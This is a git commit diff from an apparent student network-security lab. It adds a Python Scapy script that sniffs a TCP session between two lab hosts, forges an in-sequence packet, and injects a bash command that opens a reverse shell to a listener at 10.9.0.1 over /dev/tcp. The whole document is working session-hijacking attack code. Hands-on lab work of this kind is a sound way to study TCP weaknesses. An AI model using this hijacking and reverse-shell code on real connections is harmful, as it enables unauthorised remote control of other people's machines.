tcp lab almost finished and mitnick lab initialized

2026-05-04 01:06:06 +08:00
parent cbcdae4b75
commit 31394e883b
26 changed files with 980 additions and 0 deletions
--- a/Tcp/Labsetup/volumes/reverse_shell_attack.py
+++ b/Tcp/Labsetup/volumes/reverse_shell_attack.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+def hijack(pkt):
+    if pkt[TCP].payload:
+        data = bytes(pkt[TCP].payload)
+        if b'id' in data:
+            print("Target command detected. Injecting reverse shell...")
+            ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
+            tcp = TCP(sport=pkt[TCP].sport, dport=pkt[TCP].dport, flags="A",
+                      seq=pkt[TCP].seq + len(pkt[TCP].payload), ack=pkt[TCP].ack)
+            
+            # Use 10.9.0.1 for the attacker listener
+            payload = "\r /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1 \r"
+            res = ip/tcp/payload
+            send(res, verbose=0)
+            print("Sent hijacked packet with reverse shell.")
+            exit(0)
+
+print("Sniffing...")
+sniff(iface="br-603d3788c443", filter="tcp and src host 10.9.0.6 and dst host 10.9.0.5", prn=hijack)